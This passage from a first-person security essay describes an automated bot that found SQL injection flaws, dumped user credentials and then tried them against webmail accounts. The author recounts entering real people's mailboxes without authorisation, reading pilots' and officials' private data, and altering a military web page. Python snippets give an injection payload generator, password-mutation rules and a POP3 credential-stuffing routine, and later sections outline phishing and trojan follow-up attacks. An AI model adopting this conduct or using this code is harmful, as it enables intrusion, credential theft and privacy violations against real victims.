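This is exactly why the author calls it "a heaven for parser writers":
the error format is strict, so a trivial regex is all the parsing needed.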
But let's get back to the impact.
As one security response team rightfully stated in one of its reports,
one of the reasons behind the spree of malicious code embedded within web
pages may be the infection of web page administrators' computer systems
with spyware crafted specifically to steal FTP/SSH passwords stored
locally by client software like TotalCommander or PuTTY. Despite the fact
that system administrators belong to the highly security-aware group, the
possibility of a webmaster's/administrator's machine being compromised by
a malware infection definitely exists.
But this is just one possibility.
On the other hand, the constantly increasing activity observed in SQL
Injection driven attacks, and observations made during the research,
suggest at least a few different infection scenarios.
While analysing the bot's gathered data, some systems that had been found
open to penetration by the code's pentest "reconnaissance" section
(Segment-2) were also matched (after post-runtime "manual" analysis) as
previously compromised by a different human attacker (or attack code).
Certain database records reflecting the web page's contents contained an
embedded "second stage" attack code in JavaScript, prepared either to
redirect the user who opened that particular web site section, or to load
and execute additional JS code from a different remote HTTP server. In
most cases the server addresses ended with a Chinese domain suffix.
That gives us the first alternative.
The second one is the compromise of a web hosting company.
To serve a proper example right away: the bot gained access to the
database of a Polish email/www hosting company containing all the account
login/password records needed by an attacker to take control of any
website hosted by the company, providing him with correct FTP credentials
(this case was also mentioned in other sections of the text). The same
scheme also applies to penetrable databases of web application
development companies.
However, the most frequently noticed (analysing Bot's results), opened way
for attacker to infect a website with a rogue redirection/exploit code, was
to exploit the SQL Injection vulnerability within a minor, less critical or
long time dead but not yet removed webpage, stored however together on a
single SQL server administrated by a more critical assets holding
institution. Exploiting the fact that the vulnerable server side code (lets
say an ASP in our example) while accessing SQL server data can use database
user account shared with many other databases stored on that single server,
an attacker executes automated enumeration of all the R/W accessible
accounts (using for example db_name() MSSql function). After that all he
need is to select any database enumerated earlier, suiting as a DB backend
for the particular WWW site - this time more critical and not vulnerable to
any direct attack - and to alter its contents, leaving the critical "secure"
webpage either defaced or trojan infecting.
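The db_name() enumeration step above can be sketched as follows. This is
a hedged illustration under the same error-based technique, not the
bot's actual S2 code; db_name(N) returns the name of the N-th database on
the server, so forcing it into an integer context leaks one name per
induced error.

```python
# Generate one error-inducing payload per database id; each, injected
# into the vulnerable parameter, yields a type mismatch error carrying
# one database name.  Iteration would stop in practice once db_name(N)
# starts returning NULL (no error raised).
def enumeration_payloads(max_db=10):
    for n in range(1, max_db + 1):
        yield "' AND 1=CONVERT(int,db_name(%d))--" % n

payloads = list(enumeration_payloads(3))
```

With the shared DB user described in the text, walking this list is all
it takes to map every database reachable from the one weak entry point.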
The absolute record-holder of this type, given the number of R/W
accessible databases on a single SQL server, was a job portal development
company. A minor, old, but still working job website belonging to the
company was tracked down by S1 and verified by S2 as vulnerable to a
database command execution attack, using the "Register Account" interface
as the SQL command injection entry point. After enumerating the R/W
accessible databases, the bot's S2 counted 800+ databases accessible
using the same DB user as the vulnerable ASP script, including a retired
military officer job portal and law enforcement job portals.
The most critical system, however, given the possible impact of a web
page defacement/malware infection attack, was the case of a database
server belonging to the US Defense Logistics Agency (DLA). Five out of
twenty of all the server-stored databases were found write-accessible
using the same DB user account shared with the vulnerable ASP code: a
very old (dating from the last century, actually) and hardly operational
but still online system of the same agency, developed and "maintained"
(not that they didn't try), according to its welcome banner, by the U.S.
Space and Naval Warfare Systems Center (SPAWAR). It's not too hard to
imagine the possible impact of defacement/trojan infection code installed
within an official military-owned web system that renders every single
piece of data and script embedded within its main page's HTML body from
attacker-controlled database contents.
Since I've never been a big fan of shouty, messy defacements, all that
was done in this case - to validate whether modification of the
particular selected DLA page's contents (www.desc.dla.mil) was in fact
possible using a vulnerability located in a completely different
subdomain - was changing a single small 'a' letter in the front page's
welcome text to a capital one.
Actually, if the "misspelling" hasn't been noticed yet, it's quite
possible it is still there ...
One obvious conclusion is that the final, resulting impact of an SQL
Injection attack conducted through a vulnerable website entry point that
reflects the interconnected database contents can also be (for one) a
website-driven malware infection targeting client host machines. The
affected website (now hosting a hostile redirection/malware installation
script) may be any web application whose contents are rendered using a
database system shared with the vulnerable entry point, through the same
ODBC user credentials.
11. I forget, therefore I am.
////////////////////////////
So, you say you use only top-notch, well-secured systems, where common
security holes are ancient history, yet your digital account still got
hacked somehow...
Well, there's at least one thing we might be missing.
Even when you use trusted company systems like e-banking accounts, or
government- or military-provided systems which, let's assume for a
moment, are free of the most common security flaws :) , your password is
long and random, you keep it private and have never even whispered it -
there is still a single thing that makes any of these different system
accounts vulnerable: your short memory.
The first primitive bot version, messily coded, with statically
compiled-in search queries (describing just a few possible victim
patterns), after a day or two probed and matched a DB command injection
flaw within one of the web applications belonging to an aviation holding
corporation operating in the USA (the holding actually owns six different
airlines).
The actual impulse that made me continue this project and build the
multilevel attack code (rather than just drop the case after learning
that the internet is an SQL Injection swamp) was a finding made while
"studying" this particular system. After getting the admin's credentials
using the particular SQLi vuln and logging into the personnel data
administration panel, a single Excel document was downloaded, containing
updated, detailed information on 1361 company workers. Besides their
addresses, phone and SSN numbers, every personal record had filled in a
proper email address, a login name and an unprotected plaintext password
belonging to the particular worker of the aviation support company's
branch.
Now, I'm sure it may be obvious to you right now, but it wasn't so
obvious to me at the time - while sitting there in the hard chair,
looking at my laptop's display and reading the ID records - after about
half an hour of study (I know... I can't help it, I'm a slow thinker) I
realized I was not looking at computer-generated, dictionary-based
passwords assigned randomly by the web application upon registration -
but at actual, VOLUNTARILY PROVIDED sensitive user keywords, stored
without any kind of encryption, keywords with which each person asked
wanted to protect his account.
That, along with the fact that two columns to the left of the password
field in the document lay the voluntarily entered contact email address,
began to form the biggest question, which hasn't stopped driving my mind
crazy ever since: how many of those poor unaware people entered their
email address alongside the very password OPENING IT, right into a
vulnerable, browser-accessible database system...
That was actually the first time I stood before the option of
unauthorized email access. But since I was already kind of a "fallen
researcher", whose crawling code was performing something like 1000
unauthorized penetration tests of different systems a day, my conscience
didn't actually stand a chance...
I copy-pasted the first randomly chosen email/password pair into the mail
portal login page and ... I had an authenticated Yahoo mail account
session in front of me.
Ten minutes later I knew the owner was a commercial aircraft pilot
working for a US-based airline, holding a pilot license for ERJ-170 /
ERJ-190 aircraft. I had his license number along with high-resolution
scans of his FAA-issued pilot license (saved in his mailbox's 'sent'
folder), his SSN along with his detailed 401K form sent to an employer,
credentials to access the current state of his funds, and finally an
FAA-issued medical certificate scan informing that he should wear
corrective lenses.
But hey! That was just the first email/pwd combo from the list I'd used -
it was obvious it must have been just a fluke. And since getting into
random email accounts and snooping through people's lives was not the
kind of fun I prefer as a researcher, I decided to focus back on the
goal: the numbers behind the password matching attack vector. For the
rest of the day I tried to manually identify the number of matching/not
matching email credential combos, at least for some small part of the
entire list.
Approximately 3 out of every 10 passwords tested matched.
Some of them needed to be concatenated with a '1' or '2' digit (either at
the beginning or the end of the password); some had to be shortened by
removing the numerical suffix (e.g. 'bart1969' was the DB password -
additionally giving us the victim's DOB for free - and the simple 'bart'
keyword guarded the email account). Somewhere after a makeshift lunch I
ran into a hotmail account which happened to belong to a Delta Airlines
pilot. That was THE finding that actually changed my mind and made me
decide to continue the project. After a quick search through the pilot's
mail account I noticed correspondence with DA's IT branch containing
another pair of credentials - a private Delta Airlines pilot web account
(extranet) login/password and a link to the DA login portal
(connect.delta.com), sent by the IT branch after the pilot began his work
for DA.
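The password-variant matching mentioned a few paragraphs earlier (append
a '1' or '2', or strip trailing digits, so 'bart1969' also yields 'bart')
can be sketched as below. This is my illustration of the heuristic as
described, not the bot's actual S3 code.

```python
# Given a harvested database password, generate the candidate keywords
# to try against the corresponding mailbox.
def candidate_passwords(db_password):
    cands = [db_password]
    # try with a '1' or '2' appended or prepended
    for d in "12":
        cands.append(db_password + d)
        cands.append(d + db_password)
    # try with any trailing digits stripped ('bart1969' -> 'bart')
    stripped = db_password.rstrip("0123456789")
    if stripped and stripped != db_password:
        cands.append(stripped)
    return cands
```

A handful of such trivial transformations is apparently enough to lift
the raw match rate noticeably, which says a lot about how people mutate a
single base keyword across accounts.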
He hadn't deleted the message (and why would he? - after all, we all have
weak memories), leaving it on his private email account. It is not the
point here to wonder why DA didn't provide him with an internal business
mailbox restricted to be accessible ONLY from a safe intranet or via
IT-provided smart cards with asymmetric encryption, and why they allowed
such sensitive information to be sent to a private email account at all.
It is, however, the point to ask what online services could have been
accessed through the DA electronic accounts. Let's just say one of the
options the system provided to a user (pilot) was downloading
airport-specific security information and accessing FBI-issued documents
concerning aerial terrorist threat awareness.
At the end of that day I made up my mind: I would not bury the project
after just the first 2 weeks of research, but would try to make it grow
into a fully automated code able to perform automatically every single
step I had done to get where I was at that moment. The goal was simple:
to find out what numbers 'in the wild' stand behind every part of this
particular multilevel attack vector and, moreover, what its possible
mutations could be.
The next morning I identified another DA pilot's email account, also
hosted on Hotmail, within the aviation company customer list downloaded
the day before. That account also contained the email, sent from IT, with
internal DA pilot account login credentials. Multiple other FAA system
accounts, provided for pilot training / career path development, were
identified as well.
The equation is quite simple: if just one single system you have ever
logged into (or have accounts in) - having given it your universal
password scheme AND a contact email - happens to be vulnerable to a
database access attack vector, you may consider any of your other
electronic password-protected accounts in different digital systems
compromised - often EVEN if they haven't been protected by the same
secret keyword pattern.
When the attacker gains knowledge of just a nickname/login name/ID held
by the victim for accessing a more heavily protected information system
with a changeable password interface (an online bank, a business/service
online account), it could be all he needs to compromise the account.
After all, he already knows that the person used the same password at
least twice, so it's quite possible he or she could have used some
combination of it pretty much everywhere, isn't it? It is good, however,
to hear the voices of security-aware internet forum users consciously
admitting to separating their common passwords into a few different
pattern groups: one for home/local computer accounts, another for private
email accounts and finally a different one for the most critical accounts
- the ones provided by the office/service and the online financial
services. Additionally, it would be a wise practice not to tie ANY email
account, either private or business, to the same password pattern.
After all, you can never tell much about the security of the particular
web portal you are about to register a new account in. After entering the
contact email address required by the particular service's registration
process, it is crucial to use a secret word / password scheme completely
different from the one protecting your mailbox. You will sleep better
knowing that, after any possible database compromise in the future, this
will be the first and last point the attacker reaches while trying to
progress with the information you provided upon registration.
A good place for an attacker looking for email hijacking/cracking targets
could be the databases of job seeker portals designed for active as well
as retired military and government service workers. These systems are
most often filled with highly sensitive information, including SSNs bound
to detailed personal info, business email addresses, client-provided
password/secret sequences and also officer service performance reports.
In fact, this kind of data makes a target best suited to politically
motivated entities - producing in turn a cyberterror/cyberwarfare-grade
threat to a particular government organization or country - rather than
just another easy prey for a common electronic fraud criminal.
Looking at the whole case through the attacker's eyes, you could actually
argue that a particular vulnerable job portal database is much like a
bottle of wine... :)
Once the penetration has been made, all the compromised mailboxes lie
open on the intruder's table. A particular victim who registered an
account on a job portal - after getting a first job / switching to a
better one - usually advances in experience and knowledge, yet leaves the
job portal account not updated, or sometimes even forgets about it.
Additionally, since the email given during online registration at the
portal is usually the same address from which the victim contacted the
recruitment office of the new job, the attacker can easily identify the
victim's new occupation, as well as any message the victim forwarded
between the old email address (the portal-registered one) and the new
business email address. But since the victim has advanced, the importance
of his personal info, his professional competency and the scope of his
digital access have all gained in value - just like an old wine in the
'insecurity basement'. Finally, right after opening the bottle, an
intruder, by simply linking the facts, can "learn" the victim from the
correspondence stored in the different successively opened
business/private mailboxes sharing the same password pattern. By
accessing more critical infrastructure accounts belonging to the victim -
using either known-password-pattern brute forcing or "forgotten password"
reminder services - the attacker can compromise the victim's multiple
company business accounts, reflecting the victim's career path.
An example of a bot-pentested job portal system may reveal a little of
the magnitude of the possible compromise impact. A portal - designed by a
US-based company explicitly for retired military and law enforcement
officers looking for a job in civilian companies requiring higher
(secret/top secret) security clearances - was identified by the bot as
containing an exploitable server-side flaw within the "New Account
Registration" interface. Most users registered there hold, or used to
hold, a military-related career path ending with an officer rank. Often
they also hold a TS security clearance. The runtime code managed to
auto-identify and dump the email/password combo records within the
database (provided at registration by the account owners) and passed them
to the bot's Segment-3 for further automated password/email matching and
mailbox message content analysis.
Among other penetrable accounts, it was able to gain access to the
private Hotmail mailbox of a US Army Lt Col.
While holding a "Top Secret" clearance, his last occupation - according
to a detailed unclassified CV stored within the mailbox - was a position
of Branch Chief in the U.S. Defense Intelligence Agency (DIA). You could
of course ask now why a guy holding a security-crucial position like this
used the same password pattern more than once.
But that's not the point. Everybody uses a password pattern of some kind,
just as everybody has a weak memory (especially me).
There are better questions, however: why didn't he delete the message
sent to him by the US Embassy in Paris, containing information on a 6-day
'Ambassador' hotel reservation that included highly sensitive, detailed
payment information? The data within the embassy's message contained
still-valid VISA credit card details used for the room payment before a
particular European NATO event, i.e. the full 14-digit credit card
number, its expiration date and, what's most weird, the sensitive 3-digit
security code (CVV2) needed for any online payment authorization. An even
better question would be: why did the Embassy send such sensitive
information via email, especially to a private Hotmail account?
And that's just one example.
This is out of about 30 thousand mail address/password combos stored in
this portal's database, out of 800+ different other db_name()'s stored on
the particular MSSQL server and accessible through the flawed ASP
interface using the shared DB user account, and out of about 29 different
recruitment companies whose web systems have been found vulnerable to
database injection attacks by the bot so far.
You do the math...
12. Second Stage Attack Impact And Propagation.
///////////////////////////////////////////////
The mailbox credentials matching attack vector, after just a few weeks of
play, became one of the primary subjects of the research. It was
implemented as the bot's Segment-3. The attack vector employed by the S1,
S2 and S3 bot segments bound together was called, for naming purposes,
simply 'SIDECAM' (SQL Injection Driven Email Credentials Active
Matching).
In theory, after compromising the victim's mailbox password, a malicious
attacker may follow different attack propagation paths, depending
strictly on his goals - be they purely chaotic/destructive, financial or
politically motivated. Just as the motives behind the attack may differ,
the final impact of a SIDECAM-based final stage compromise may also vary,
ranging from a sensitive information leak, through further machine
compromises, up to secure intranet infrastructure penetration.
The impact of the final 'SIDECAM' attack stage alone (S3) is in fact the
impact of a successful password compromise attack against a particular
mailbox, whether private, business or government-provided.
Before launching S3, the gathered email/password pairs were checked for
password frequency. The 40 most frequent passwords (i.e. passwords
harvested by S2 - NOT the passwords identified by S3 as matching their
corresponding email addresses) within the gathered base of 150K, sorted
by descending frequency, were:
123456
1234
12345
12345678
password
test
cancer
pass
fringe
drugs
qwerty
mother
summer
sunshine
soccer
654321
abc123
london
monkey
123456789
sparky
111111
baseball
captain
sailing
letmein
freedom
murphy
fashion
maggie
monaco
tigger
1234567
chocolate
dallas
flower
michelle
pain
shadow
1111
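A frequency check like the one above is a one-liner with a counter. This
is a minimal sketch of the idea (my illustration; the harvested pairs are
assumed to sit in a list of (email, password) tuples):

```python
from collections import Counter

def top_passwords(pairs, n=40):
    # Count every harvested password and return the n most frequent,
    # in descending order of frequency.
    counts = Counter(pw for _, pw in pairs)
    return [pw for pw, _ in counts.most_common(n)]

pairs = [("a@x", "123456"), ("b@x", "123456"), ("c@x", "1234")]
# top_passwords(pairs, 2) -> ['123456', '1234']
```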
When the bot's S3 was able to go operational (after S2 had provided it
with enough mail credential pairs), it first processed exactly 16344
email/password pairs (out of the 151595 gathered in total by S2 during
its first few weeks of runtime).
S3 was configured to target only specific free mail provider accounts:
Hotmail, Msn, Gmail, AOL, Verizon, Comcast and EarthLink.
After reaching 16344 processed mailbox credential pairs (i.e. ones
belonging to the preconfigured provider pool list), Segment-3 was shut
down. It matched exactly 3127 pairs as positive (i.e. ones for which the
particular password successfully opened its corresponding email account,
accepted either by the provider's POP3/IMAP4 mail server or through the
S3-implemented HTTP/S webmail login interface parametric proxy).
The final "password reuse factor" (PRF), visualizing the level of
universal password usage among internet users, oscillated through the
runtime around 0.15 - 0.24 (in short: approximately 1 out of every 4-5
processed email owners uses the same password scheme for his digital,
password-protected accounts). It should also be mentioned that the
amplitude of the PRF's oscillation through the runtime depended mostly on
2 factors: the type of the system (its infrastructure criticality level,
expressed directly in the trust the users place in the system) and the
age of the particular S2-compromised system (the age of the most recently
created account).
The reasoning behind the second factor is rather obvious - for a
10-year-old portal / web system account there is a far lower probability
that the Em/Pw combo will still match (it is more probable that the
password has already been changed, after a compromise or as a result of
increased user security awareness, or that the account has been abandoned
/ deleted).
The first factor expressed itself most evidently in the case of a
vulnerable U.S. Department of Justice system. The users here were mostly
US Gov officials, usually law enforcement workers. The highest PRF
(around 0.24) was noted in this particular system's case - the highest
share of Em/Pw combos was found matching by S3.
Later, apart from the free-email-provider S3 runtime, a different S3 test
case was executed (one targeting password matching for non-free,
government-provided email accounts). It resulted in access to multiple
email accounts, belonging mostly to PD officers and Sheriff Dept
officers. It's unclear, however, what the true factor behind the numbers
in this particular system's case was - whether they were a result of some
kind of "reckless distance" a gov worker keeps from his job ("I don't
need to care about every single digital account the gov gave me, as long
as it's not my bank account") - which, in this specific system's case
(DoJ), would be somewhat ironic - or rather the complete opposite:
"since I'm registering the account and entrusting my personal ID and
password to the hands of a gov department that handles people's security,
how could it possibly be unsafe and open to compromise? - i.e. my
universal password is safe here."
Finally, the runtime results were correlated and compared, showing PRF
factors for each separate email provider:
ProcessedHotmail = 7070
ProcessedMsn = 792
ProcessedGmail = 3750
ProcessedAOL = 2625
ProcessedVerizon = 308
ProcessedComcast = 996
PositiveHotmail = 1664
PositiveMsn = 184
PositiveGmail = 386
PositiveAol = 490
PositiveVerizon = 45
PositiveComcast = 189
HotmailPosFactor = 0.23
MsnPosFactor = 0.23
GmailPosFactor = 0.10
AolPosFactor = 0.18
VerizonPosFactor = 0.14
ComcastPosFactor = 0.18
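For the record, the per-provider factors above follow directly from the
Processed/Positive counts. A small sketch (assuming the listed values
were truncated, not rounded, to two decimal places - an inference from
the numbers, e.g. 490/2625 = 0.1867 is listed as 0.18):

```python
import math

def prf(positive, processed):
    # Password reuse factor, truncated to two decimal places.
    return math.floor(positive / processed * 100) / 100

# e.g. prf(1664, 7070) reproduces the listed HotmailPosFactor of 0.23
```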
Although, in my opinion, EXTREME CAUTION should be taken before drawing
any real conclusions from these numbers, there is at least one thing that
draws attention: over twice as many statistical users had a positive
password reuse match for Hotmail and Msn as for Gmail (while treated as
two different test groups, Hotmail and Msn, amazingly, produced the same,
highest PRF - both being correlated by their mutual service provider,
i.e. Microsoft).
There are also questions concerning the reasoning behind some of the
protections, whether security- or commercially motivated, implemented by
particular email providers. Gmail and Hotmail, for example, have a
well-implemented captcha solution to verify whether successive mailbox
auth attempts are driven by a human (i.e. for security reasons). However,
if one chooses POP3-based mail synchronization, freely accessible there
to anyone, he can easily run an automated robot code.
In the Yahoo! Mail case we deal with the opposite situation - since there
is no free POP3 mail server available to Yahoo Mail free service users,
just a commercial solution called "Yahoo! Mail Plus", there is no easy
way to complete an automated POP3-driven password match (when we try a
POP3 mail server with a particular free-mail Em/Pw pair, we get an
AUTH-FAILED error, just as if the account/password didn't match - yet
when accessed through Yahoo's webmail interface, we could log in
successfully). Since the Yahoo webmail interface doesn't implement any
captchas, one could easily run an automated credential matching code just
by implementing an HTTPS webmail proxy wrapper.
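The POP3 side of this matching is trivial to sketch. This is my hedged
illustration, not the bot's actual S3 code; the host name is a
placeholder, and the login step is injectable so the matching logic can
be exercised without a network connection.

```python
import poplib

def pop3_login(host, user, password):
    # Attempt a POP3-over-SSL login; True if the server accepted the
    # credentials, False on an authentication error.
    conn = poplib.POP3_SSL(host, 995)
    try:
        conn.user(user)
        conn.pass_(password)   # raises poplib.error_proto on AUTH failure
        return True
    except poplib.error_proto:
        return False
    finally:
        conn.quit()

def match_pairs(pairs, login=pop3_login, host="pop3.example.com"):
    # Return the subset of (email, password) pairs the server accepted.
    return [(em, pw) for em, pw in pairs if login(host, em, pw)]
```

Which is exactly why a captcha on the webmail form alone buys nothing if
the same account is reachable over a bare POP3 interface.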
The second part of this section focuses on successful SIDECAM attack
propagation - what could happen AFTER the hostile party succeeded in
breaching our mailbox. Since the further exploitation paths following
unauthorized email access are limited only by the attacker's imagination,
we can try to sketch a few of the most probable courses of action for a
hypothetical intruder.
The very first thing an arbitrary attacker would probably do after
breaching the victim's mailbox is the enumeration of any other accounts
and systems the victim has access to. One good way to do this would be
simply to use the webmail 'message search' features and look for any
message containing the words 'password', 'account' or 'login' - these
emails will contain either registration confirmation credentials for
different systems, password reminder data or other details revealing the
existence of further electronic accounts belonging to the victim (social
portals, job portals, business or service restricted systems, web
admins' / web developers' FTP credentials, etc.).
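The keyword sweep described above amounts to a few lines of filtering. A
trivial sketch (my illustration; the message store is assumed to be a
list of plain-text bodies):

```python
KEYWORDS = ("password", "account", "login")

def interesting_messages(messages):
    # Keep every message mentioning any of the credential keywords,
    # case-insensitively.
    return [m for m in messages
            if any(k in m.lower() for k in KEYWORDS)]

mailbox = ["Your ACME account was created, login: jdoe",
           "Lunch on friday?",
           "Password reminder: bart1969"]
# interesting_messages(mailbox) keeps the first and third message.
```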
After the enumeration of the less critical, low-security system accounts
(the ones whose credentials were either already stored within the mailbox
or could be retrieved successfully using just their login/ID and the
appropriate send-password reminder services), the attacker may focus on
more strongly protected system accounts, like online banking accounts and
electronic money operation systems.
Let's look at the facts here.
Today's well designed financial operations system is a fortress. Or should
we rather say: it is meant to be a fortress. Most probably, it would be one
if both its defense system operators and its clients were robots.
In the real world, however, the security of a particular financial system's
client depends STRICTLY on his security threat awareness and - what's far
more important - on the threat imagination he has managed to develop.
Let's take a look, for example, at a common, well secured online account
facing a possible compromise of the related email's credentials. The
particular online bank provides the account's owner with brute force attempt
protections, never allows any sensitive data to be sent to the related email
address (so the attacker can't simply "email-remind" the account's
credentials), employs 2- or 3-level password authentication mechanisms,
separately for cash and non-cash operations (including one-time passwords
and SMS transaction authorization) and finally hardens the forgotten
password/reset operations with various ID information challenge-response
requests.
But as usual, there is one tiny issue in the whole case - no matter how hard
security specialists may try, we are just humans, not robots.
Quite often the amount of ID data embedded in the correspondence and various
sensitive documents found by the Bot's reconnaissance of a particular
mailbox was all the intel a malicious attacker would need to perform the
bank account password reset. SSNs, DoBs, addresses, phone numbers, detailed
health and service reports, even a secret question/answer combo (a universal
one as well) could be found in the victim's mailbox - within sent and saved
CV documents, detailed cover letters, business correspondence or the account
configuration. The SMS authorization services can also be diverted (by
resetting/changing the SMS number), using the info the attacker acquired
after the mailbox breach.
Finally, what could be "noticed" during the research: in various cases a
particular person used his universal password four times or more, in
different places (including the email password), in one form or another
(often concatenated with the digit '1' to meet a particular password
policy's requirements) - so it wasn't much of a surprise to find that in a
few cases the very same password protecting the mailbox was also protecting
that user's online bank account.
Most surprising, however, despite all the warnings in the banks'
correspondence disclaimers, was to find in a user's mailbox a self-forwarded
message containing either partial or full credentials (UserID/Pw) for
accessing a particular web bank account. Even better: one particular person
had made an email folder named 'my passwords', where he stored all the
"needful" sensitive info, including PayPal IDs and aviation portal/system
accounts (he was a pilot). It seems that the one thing distinguishing a
human from a robot is most definitely a weak memory.
The easiest (but least subtle) action an attacker could perform is email
account hijacking (changing its password, secret question and answer).
Although it's probably the last thing to do if one wants to keep the
compromise of the account's credentials undetected for as long as possible,
it could make a successful tool for further blackmail and extortion attacks.
Finally, let's not forget about spam robots and automated email spoofing.
I agree: remote machine hijacking using malware, exploiting physical access
to the victim's email account data along with the contacts stored in the
host machine's email client, is one of the most common ways for spammers to
obtain both spam zombie robots and valid email account credentials. But I
guess not the only one.
Accounts compromised by an automated SIDECAM attack can make effective fuel
for spammers of any kind as well.
Browsing through a compromised sheriff's department mailbox belonging to an
IT Division Chief (after a completed SIDECAM phase on one of the vulnerable
Department of Justice systems mentioned earlier), I spotted a message
describing a recent incident involving spam being sent from one of the
sheriff's dept email accounts. It cautioned the SD's users ONLY to recheck
proper AV settings when operating from home machines. However, if the leak
source was not malware infection of the government worker's home machine but
a similar SIDECAM-like attack on the DoJ, then reinstalling an AV or even
setting up a fresh, clean OS wouldn't make any difference to the attacker
who targeted the particular sheriff's department account, as the source of
the email credentials compromise was both the leaky DoJ system and the
password reuse vulnerability.
The previous example introduces a second, far more interesting group of
attacker's courses of action, involving social engineering mechanisms and -
unlike the spambots - targeting precise, high value targets (chosen by a
specific attacker profile, for example financially or politically
motivated).
Since this type of attack, to be successful, requires the attacker to
properly study the victim's profile (using, for example, info gathered from
the victim's correspondence and social portal accounts), it cannot be
automated (I mean: at least until 2029 you will need a human to deceive a
human :)
Let's focus first on an attack spoofing the identity of the compromised
email account's owner (let's call him "victim1") and targeting a specific
person ("victim2") from the breached mailbox's contact list.
A hypothetical attacker, after checking victim1's contacts (by either
analysing mailbox contents downloaded over POP3/IMAP or simply accessing the
contact list through the particular webmail interface), will begin by
building a personal identity pattern for victim2 including every piece of
info he can find: what he/she likes, which types of web sites he/she visits
(has accounts in), current and previous occupation, interests/preferences,
what kind of information is exchanged between the contact and the mailbox
owner, what is the highest priority matter for victim2 at the moment, and so
on.
Following that, an email must be forged employing the stolen identity intel,
containing as much personal data as possible to render the message credible.
The attacker's goal will be to urge the remote mailbox owner (victim2) to
respond "positively" (according to the attacker's objectives), by either:
- visiting an attacker controlled web site hosting malicious remote attack
code,
- launching an attached script/binary,
- revealing sensitive information.
The possible impact of such an attack is obviously compromise of victim2's
client machine and access to sensitive information.
A specific mutation of this attack vector, which does not however require
the attacker to execute a successful password matching SIDECAM attack, could
be exploited in the so-called "spear phishing" scheme. It involves a
phishing attack with one major difference from common phishing - the fact
that the attacker already knows that the owner of every email address on the
spammed list possesses an account in the particular system (social portal,
online banking system, a particular corporation's employee restricted
system) - an account the attacker is interested in. After properly
researching the targeted organization, the attacker will target that precise
account type.
Note that this attack may be launched by an arbitrary attacker after any
successful harvest of database email records, especially when neither Login
nor Password data could be retrieved (they were properly one-way encrypted,
for example) and just a bare email list and maybe some basic ID data (like
name, phone or address) was obtained - this kind of data is all the attacker
needs to forge a trustworthy, credible message pattern and execute a spear
phishing attack, targeting for example the Login/Pwd account combos of the
particular system.
Another kind of possible email breach exploitation (SIDECAM based or not)
would be inverted (with reference to the previous example) identity
spoofing, i.e. the case where the attacker, while spoofing some other email
identity (for example one of victim1's contacts - i.e. victim2 in the
previous example), sends a spoofed message to the controlled (breached)
victim1's mailbox, exploiting the intel gathered so far through the
victim1's email access.
After forging a credible, detailed message, the attacker can execute social
portal credentials phishing, bank account phishing, aim for victim1's
sensitive data (ID data / business secrets / service related confidential
data), spoof victim1's company representatives (anyone with a high enough
rank, found in the contacts or by email analysis) or execute a
remote-execution attack by sending malware of any kind the mail server
operator won't filter out (an executable / document-embedded 0day),
authenticating the message with the intel gathered so far on either victim1
or his spoofed contact, victim2.
Possible impact: compromise of the breached mailbox owner's machine
(victim1's).
A specific subtype of the above attack would be "active conversation
interception". In this scenario an attacker, based on mailbox event tracking
(analysing any newly opened conversations, answers awaited to the victim's
question/topic), will try to intercept (detect/read/delete) any possibly
high priority message (an answer awaited by the mailbox owner - victim1),
forging and sending a spoofed message inducing victim1 to either share
sensitive information or respond by executing (opening) a malware (exploit)
attachment. The more the conversation is valued by the victim, the higher
the probability of a successful attack.
Most likely to be exploited by this kind of attack would be, for example, a
resume (CV/cover letter) sent to a remote company and awaiting response,
conversations with old colleagues and family members (but only those for
whom this email is the only way of communicating with the victim), or a job
offer from a registered job portal (since it is most probable that the
attacker will gain access to the job portal using victim1's already known
universal password, he will also be able to monitor any events within
victim1's job portal profile, so any messages FROM the portal after profile
updates can be expected to be high priority to victim1), etc.
Another example would be execution of an ID phishing attack, spoofing any
actively (currently) used job portal mail account, with a message containing
a link to an attacker controlled ID-data-phishing web site and requiring
additional, sensitive ID data (service reports / current job projects /
etc.), giving the false impression of a possibly attractive and available
job offer.
A certain mutation of that attack scenario would be a phishing attack
targeting credit card data.
After noticing that the victim possesses a credit card and recently used it
in some online shop (by looking for any possible shop response messages in
the victim's mailbox containing a successful purchase notification), and
after intercepting (deleting) the message, an attacker can begin a phishing
attack and imitate a shop's CC-data-update website, similar to the one the
user previously registered his card in, requesting a CC data update and
justifying the operation with e.g. security reasons and victim's shop
account validation.
The last interesting way to exploit unauthorised email account access that I
came across during the project was self-forwarded attachment overriding.
The idea appeared after accessing an email account belonging to a Victoria
Police Department computer forensics detective. Among investigation reports,
forensic software FTP account data and other service related messages, my
attention was drawn by a recently self-forwarded message containing a zipped
installation version of cell phone forensics software.
While the only reason to forward an installation binary to oneself (it has
happened to me a few times) is to be able to quickly set up the software on
a clean machine in a new place with just an internet connection, there was a
quite reasonable assumption that the file would be used (remotely executed)
in the near future.
An attacker could exploit that fact by replacing the recent message with one
containing an altered attachment, i.e. the same software installer combined
with trojan code.
The resulting impact would be compromise of any machine that victim1 would
install the attached program on.
Apart from this particular example, any properly conducted, sophisticated
social engineering attack exploiting a compromised police department email
account may also result in infection and further penetration of the police
department's secure intranet system.
Note: spoofing driven attacks will most likely, after a relatively short
time, trigger a response message from the target to the person whose
identity has been spoofed, with questions about the suspicious message
(assuming only that the person is highly aware of common security threats),
which in turn will uncover the attack, and most likely the mailbox
compromise as well, triggering further actions by the victim such as
compromised machine cleanup. Therefore the attacker's time window to utilize
the compromised system will be relatively small.
Let's also not forget that a properly designed, EXTERNALLY (internet)
accessible webmail interface should provide every account holder with
mailbox login-event IP/date tracking features, recording at least a few
previous logins (Gmail would be one good example of such a proper
implementation).
On the other hand, finding the "source" (e.g. a particular credential
information leak source) of the victim's mailbox password compromise is a
difficult task.
After the problem has been signaled, even if one can assume the compromise
source was a SIDECAM-like attack, it would be hard to quickly point out the
precise system that, after being successfully attacked using SQL Injection
(or any other data-targeted attack), became the source of the sensitive
information leak. The particular victim could hold many accounts in
different systems - systems that could be old enough to hold multiple
vulnerabilities of different types.
The affected person might also have forgotten some of the system accounts a
long time ago (it has actually happened to me a few times) - accounts that
are still active, or perhaps never even logged into again, having passed
through these systems just to "check&leave" there his most precious
sensitive information (the universal password, for example). After some of
the more critical system accounts are compromised, it may sometimes be
practically impossible to track the origins of the particular victim's
password data leak.
I should mention at the end that all the attack patterns presented above
belonging to the second group of attacks (attacks involving social
engineering) are THEORETICAL SCHEMES ONLY, and haven't been executed by me
in any real situation during project time.
13. Teaching a robot how to "value" its victim.
///////////////////////////////////////////////
Since the 'SIDECAM' attack vector is an example of a randomized-victim
attack type, to gain the most valuable results an attacker must focus on
proper parametrization of his code: he must design it in such a way that it
